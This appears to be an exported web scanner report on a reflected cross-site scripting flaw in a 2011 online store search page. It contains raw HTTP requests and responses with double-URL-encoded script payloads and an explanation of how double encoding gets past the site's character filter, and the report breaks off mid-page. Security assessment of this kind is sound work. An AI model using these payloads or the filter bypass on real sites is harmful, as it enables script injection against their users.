User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20543
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:35:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&9acfescriptalert(1)/scripte33fb55fc1=&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&9acfescriptalert(1)/scripte33fb55fc1=&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>

</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" selected>Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Accessories</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"></div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484'/>accessories</a> / <a href='googlesearch.aspx?category=accessories'/>xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessories&x=0&y=0&9acfe'><script>alert(1)</script>e33fb55fc1=1&q=xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484'/> xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484</a>?</font></i></h2></center></div>
<div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(document.location)</script>17349f37484</i></div></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAX9AzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmOWFjZmVzY3JpcHRhbGVydCgxKS9zY3JpcHRlMzNmYjU1ZmMxPSZyYW5rQnk9cHJpY2U6YXNjZW5kaW5nJz5QcmljZSAoJC0kJCQpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXMmcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQmeD0wJnk9MCY5YWNmZXNjcmlwdGFsZXJ0KDEpL3NjcmlwdGUzM2ZiNTVmYzE9JnJhbmtCeT1wcmljZTpkZXNjZW5kaW5nJz5QcmljZSAoJCQkLSQpPC9hPjxici8+ZAIBDxYCHgdWaXNpYmxlaBYCAgEPFgIfAGVkAgIPFgIfAWgWAgIBDxYCHwBlZAIDDxYCHwFoFgICAQ8WAh8AZWQCBA8WAh8AZWQCBQ8WAh8ABdECPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHgnPkhvbWU8L2E+Jm5ic3A7LyZuYnNwOzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3E9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jy8+YWNjZXNzb3JpZXM8L2E+Jm5ic3A7LyZuYnNwOzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJy8+eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0PC9hPmQCBg8WAh8AZWQCBw8WAh8ABcoCPGgyPjxjZW50ZXI+RGlkIHlvdSBtZWFuIDxpPjxmb250IGNvbG9yPSdibHVlJyA+IDxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJng9MCZ5PTAmOWFjZmUnPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5lMzNmYjU1ZmMxPTEmcT14c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQnLz4geHNzIDEyMyA0NTYgNzg5MCBmM2Q4IHNjcmlwdCBhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0IDE3MzQ5ZjM3NDg0PC9hPj88L2ZvbnQ+PC9pPjwvaDI+PC9jZW50ZXI+ZAIIDxYCHwAFigE8ZGl2IGNsYXNzPSJuby1yZXN1bHRzIj5ObyBSZXN1bHRzIEZvdW5kIGZvciBzZWFyY2ggPGk+eHNzIDEyMyA0NTYgNzg5MGYzZDhhPHNjcmlwdD5hbGVydChkb2N1bWVudC5sb2NhdGlvbik8L3NjcmlwdD4xNzM0OWYzNzQ4NDwvaT48L2Rpdj5kAgkPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkAgsPFgIfAAWpA2h0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL3Nob3BwaW5nL3NlYXJjaC92MS9jeDowMTY0NTg1MDE2NDU4ODQwNTc5MTI6ZHFfaXhid2h1azgvcHJvZHVjdHM/ZmFjZXRzLmVuYWJsZWQ9dHJ1ZSZjb3VudHJ5PXVzJm1heFJlc3VsdHM9MTImZmFjZXRzLnVzZUdjc0NvbmZpZz1UcnVlJmZhY2V0cy5kaXNjb3Zlcj0xMDA6MTAwJmFsdD1hdG9tJnNwZWxsaW5nLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLnVzZUdjc0NvbmZpZz10cnVlJmtleT1BSXphU3lDU0pNYXY2YXlnamxWM3p1MHZsNDBqYnJNaGRLZkZjcm8mcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGFzY3JpcHRhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0MTczNDlmMzc0ODQmcmVzdHJpY3RCeT1nc2NhdGVnb3J5KHRleHQpOmFjY2Vzc29yaWVzZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUTY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwKl+aqmBAKs4eTNDgK6oZTsCg==" />
</div>
<input name="ctlSignup$EmailAddress" type="text" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

1.3. http://www.googlestore.com/googlesearch.aspx [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f3d8a%253cscript%253ealert%25281%2529%253c%252fscript%253e17349f37484 was submitted in the q parameter. This input was echoed as f3d8a<script>alert(1)</script>17349f37484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%25281%2529%253c%252fscript%253e17349f37484&x=0&y=0 HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?topseller=yes
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.4.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19980
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 18:59:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%281%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%281%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>

</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" selected>Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Accessories</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"></div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?q=xss 123 456 7890f3d8a%3cscript%3ealert%281%29%3c%2fscript%3e17349f37484'/>accessories</a> / <a href='googlesearch.aspx?category=accessories'/>xss 123 456 7890f3d8a%3cscript%3ealert%281%29%3c%2fscript%3e17349f37484</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessories&x=0&y=0&q=xss 123 456 7890 f3d8a script alert(1)/script 17349 37484'/> xss 123 456 7890 f3d8a script alert(1)/script 17349 37484</a>?</font></i></h2></center></div>
<div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(1)</script>17349f37484</i></div></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWRAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjgxJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQmeD0wJnk9MCZyYW5rQnk9cHJpY2U6YXNjZW5kaW5nJz5QcmljZSAoJC0kJCQpPC9hPjxici8+PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXMmcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyODElMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCZ4PTAmeT0wJnJhbmtCeT1wcmljZTpkZXNjZW5kaW5nJz5QcmljZSAoJCQkLSQpPC9hPjxici8+ZAIBDxYCHgdWaXNpYmxlaBYCAgEPFgIfAGVkAgIPFgIfAWgWAgIBDxYCHwBlZAIDDxYCHwFoFgICAQ8WAh8AZWQCBA8WAh8AZWQCBQ8WAh8ABbECPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHgnPkhvbWU8L2E+Jm5ic3A7LyZuYnNwOzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P3E9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjgxJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyODElMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NDwvYT5kAgYPFgIfAGVkAgcPFgIfAAX/ATxoMj48Y2VudGVyPkRpZCB5b3UgbWVhbiA8aT48Zm9udCBjb2xvcj0nYmx1ZScgPiA8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3